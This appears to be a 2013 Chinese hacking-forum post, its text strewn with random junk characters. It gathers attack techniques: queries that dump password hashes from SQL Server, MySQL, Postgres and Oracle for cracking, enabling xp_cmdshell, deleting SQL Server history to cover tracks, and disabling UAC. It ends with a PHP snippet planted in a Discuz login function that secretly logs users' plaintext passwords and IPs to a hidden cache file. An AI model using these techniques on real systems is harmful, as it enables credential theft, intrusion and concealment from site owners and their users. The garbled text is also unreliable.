SELECT password from master.dbo.sysxlogins where name='sa'9 Y8 ?8 `5 V- {0 g% K; q
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
+ P" _% ]& E# O: y" z: F: m8 h% T2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- w) ^) ]. n7 p6 i" E1 N2 R
. y4 U4 ~5 {2 j+ g: X
0×0100- constant header
@$ m+ Y b5 n% g34767D5C- salt/ f: d9 g4 [7 k
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash) D0 R7 [% @* S7 W- Q# d0 Q/ d' c
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
# u6 K7 g. R" mcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash& g: O* A# u$ L, x5 }* J5 `
SQL server 2005:-
8 R7 ~; }' {( A2 j' O- RSELECT password_hash FROM sys.sql_logins where name='sa'" A$ c' n( K; k% ]8 T, ]: ~
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
* Z3 z$ q/ n) e% J8 \ D0×0100- constant header! q F. [8 X; u. G( V
993BF231-salt* v6 `' K8 M! m
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash# e8 l. f* L6 |# r* Z/ S& T% }
crack case sensitive hash in cain, try brute force and dictionary based attacks.
) q9 P H2 h9 N' V. N( p5 S7 g8 p
update:- following bernardo’s comments:-
0 j. {6 w1 e! Euse function fn_varbintohexstr() to cast password in a hex string.
* I5 k. g, B% X/ [7 ~" b1 Re.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
! t) n: ?% R! Y$ m+ M$ Q G6 L! c6 o- v
MYSQL:-: a1 L' A; J0 g" N$ u6 |
0 @( Z1 @4 i$ c1 \9 V
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
7 _ s0 y& \+ \; t1 B
) q9 p0 X1 t1 l1 B1 f5 s*mysql < 4.1
7 D: {" |; k1 V" \& P- B2 H, Z9 F- Y/ }" C* t; Q. r. I( m0 A
mysql> SELECT PASSWORD(‘mypass’);
9 T c& Q4 F/ l; Y% w/ L+——————–+
9 D0 A1 T5 {; _& _| PASSWORD(‘mypass’) |
" z) R0 R1 x* Q7 V+——————–+
. U! @8 I/ S% L| 6f8c114b58f2ce9e |
0 q* k( T3 q5 d+——————–+
" ^! |! Z- z T- X6 g8 e, u9 ]3 `6 c* W8 d$ D' t6 d
*mysql >=4.1
7 i5 _" U1 h5 p1 o2 ~0 M- W! h' I s! L0 F: c2 u
mysql> SELECT PASSWORD(‘mypass’);
# [5 l' H3 Z- K5 z; m; m3 Y$ U1 M+——————————————-+% R" E j* f6 S/ i8 ?
| PASSWORD(‘mypass’) |
) O: ?9 ]4 b/ @$ E, b' N+——————————————-+5 ^; _: R+ L: p: u
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
8 Y! y8 f0 E, c+ w" J+——————————————-+
3 H6 X4 a" g$ ~. T4 j+ T1 e( X$ |( O5 s% C
Select user, password from mysql.user9 z" R5 O5 n8 @: ], Z
The hashes can be cracked in ‘cain and abel’
* w0 P3 l( t# u) T7 v$ l9 r$ H% [% y
Postgres:-. e8 | D. N, m _6 d" M
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)6 P! C {/ T. p. f) g
select usename, passwd from pg_shadow;2 o+ ?. u5 p9 Z1 {# i
usename | passwd2 _1 {2 {2 ~- C% r' o& {
——————+————————————-
. E& j% _. T* ?: P. \% G8 ztestuser | md5fabb6d7172aadfda4753bf0507ed43961 h* p. u. h/ b( ~ o% l( N& |
use mdcrack to crack these hashes:-- p1 z$ V/ K. c
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43963 q% H& Y- r; Z4 y0 c' o
. E5 f8 d$ j& J) s* ]6 [+ XOracle:-- h+ n3 Y! q4 ] y& |( C' L& {
select name, password, spare4 from sys.user$3 v4 w ?% H; R( g9 v# ~
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
. w9 {- g; Z- q, JMore on Oracle later, i am a bit bored….8 c9 p3 b* {* W: W! Y
1 ]) ^& f) [; x3 Y' S$ ~4 h% a$ g6 B/ m$ I
在sql server2005/2008中开启xp_cmdshell
# X- E: k# Q( A. G6 w-- To allow advanced options to be changed.
5 l% p# w5 o9 o* D4 v/ REXEC sp_configure 'show advanced options', 1
4 C# i6 P4 ~! S& {& @GO8 ^0 b$ |4 j/ G' p( u r
-- To update the currently configured value for advanced options.( H( S2 N+ Y9 a6 }1 K2 k
RECONFIGURE9 n8 v/ U, X/ P' j4 [5 N& O1 W" D
GO
* K7 [. O- z: V* W-- To enable the feature.6 h% h0 g+ X1 R- g5 L: b# B$ s: j
EXEC sp_configure 'xp_cmdshell', 1
( a8 @ u& B) vGO
# S$ d" `$ E6 `% j-- To update the currently configured value for this feature.* m* x2 b$ r( m" Z7 V, E5 b5 ?
RECONFIGURE
$ B9 h" B( [. z$ i& C3 i0 xGO
3 e6 ^2 D% x4 s2 PSQL 2008 server日志清除,在清楚前一定要备份。7 L+ ~% X( Z7 S& W/ Y- Q
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:& ?0 [' I6 J+ |! ]
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
4 `$ {/ X0 a% A! T) P
2 a8 H/ j$ t' o" }, `9 j- R4 L对于SQL Server 2008以前的版本:
( j0 s7 C) G( ^' ~7 LSQL Server 2005:
5 f: R) v/ u4 }. _4 q删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat! Y U% b! z# t& R: U/ z0 f
SQL Server 2000:
4 V& {+ E, f" J# n6 N清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。: a9 X: F5 r2 T# d# I! B* s/ o
9 ], }; p0 [, E2 _' b3 G( c
本帖最后由 simeon 于 2013-1-3 09:51 编辑) S, Q) I( w n9 k' G% u4 @
( n% b0 K% Z9 I# d8 D9 O
. a0 _; o1 X/ a0 P9 j0 hwindows 2008 文件权限修改
. d& \0 G& H# m% Y/ ~6 s* X$ V1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx3 t" ?3 ~% V) t5 e6 w
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
2 ^7 I& ^. n0 t/ I, @) G一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
2 w# v8 Z& H1 T+ t4 v4 Y5 K, B, X
9 I+ k2 F c0 |4 n7 z, s+ hWindows Registry Editor Version 5.00% j% M# g# Y2 H: q( a. k
[HKEY_CLASSES_ROOT\*\shell\runas]' k9 D$ O% E+ N
@="管理员取得所有权"
" h5 A/ ?: N) G! ~3 W"NoWorkingDirectory"=""5 B6 o6 Z% N4 p q0 n: S- z
[HKEY_CLASSES_ROOT\*\shell\runas\command]
' h3 O/ C0 Z! b4 y$ q@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
- o( A. T' O/ C; p+ H5 q+ y6 {( t8 {"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, f1 z% \/ N9 I" }. ]' D' t) M[HKEY_CLASSES_ROOT\exefile\shell\runas2]
( I( k/ g6 M9 V7 r% [) {@="管理员取得所有权"& q" @! a' ~% ~( H/ n
"NoWorkingDirectory"="" D1 z3 r; D/ h* n* `$ |8 e
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
- e8 J+ ~" b: G) i@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"( y+ `5 v& y) u! @+ b4 E' L
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
1 A2 L6 w# `( r+ S6 R) g( {) p( W- m$ v; {
[HKEY_CLASSES_ROOT\Directory\shell\runas]1 t2 k7 b9 t) ~
@="管理员取得所有权"2 N! {4 p8 l+ n, U+ Z
"NoWorkingDirectory"=""2 d6 D, y" a. f
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
, M2 y, ]0 J# O% a' D4 _& A9 B@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"3 @* y2 N8 q- F, ?2 E- U
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"- `) \% j: | N& y" b
3 H' ]! v: P P0 ~) \9 B p0 Z E2 m; f* b' G
win7右键“管理员取得所有权”.reg导入
. Y' u1 O8 i, v: V二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
6 ]" u/ o1 l3 b9 w* w1 t1、C:\Windows这个路径的“notepad.exe”不需要替换
2 q+ u. A" q0 N# E3 Q2、C:\Windows\System32这个路径的“notepad.exe”不需要替换9 O" A1 I8 N) I; l3 E1 s
3、四个“notepad.exe.mui”不要管& k7 w+ Y0 H8 j. x5 D: e, M
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
4 p! l) ^5 e2 l- J7 |6 R* jC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”3 B; k w6 [; t* _
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
0 g. d, t! i" E4 E) S, F; w替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
8 b! R+ F/ t* n% Twindows 2008中关闭安全策略:
( m" A. N. r6 [" ureg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
: ]$ y& F3 m- I0 H" h修改uc_client目录下的client.php 在
6 U E* N/ F! @0 R$ u; v+ ^1 Xfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
8 L" @) V1 q& Y9 s+ G下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
) U3 C( B4 S7 `5 g v8 E. I你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
W' x5 w9 r. E5 N6 @( |1 fif(getenv('HTTP_CLIENT_IP')) {
3 _, f( ?* P0 \$ |2 ~* Z$onlineip = getenv('HTTP_CLIENT_IP');
& T% f" c/ G3 E2 O. r6 D} elseif(getenv('HTTP_X_FORWARDED_FOR')) {5 L' j7 T. f1 r% k: r% D# Z3 @5 V0 @
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
7 V/ N! J7 o1 ~5 J} elseif(getenv('REMOTE_ADDR')) {
1 c4 P$ t5 B7 F+ r% U$onlineip = getenv('REMOTE_ADDR');
" \- x/ m; Z E7 A} else {; c9 E! G$ B9 O0 X( e5 a
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
, X% y g4 x3 |6 |: M) W}
" ~1 p+ y$ v5 g6 W& v+ @" u, O k. Y) C $showtime=date("Y-m-d H:i:s");( M4 E. q5 {: q
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";; R7 E& _7 U8 x7 ]
$handle=fopen('./data/cache/csslog.php','a+');
/ Q1 [/ C# E3 Q/ |- R& Y% S $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对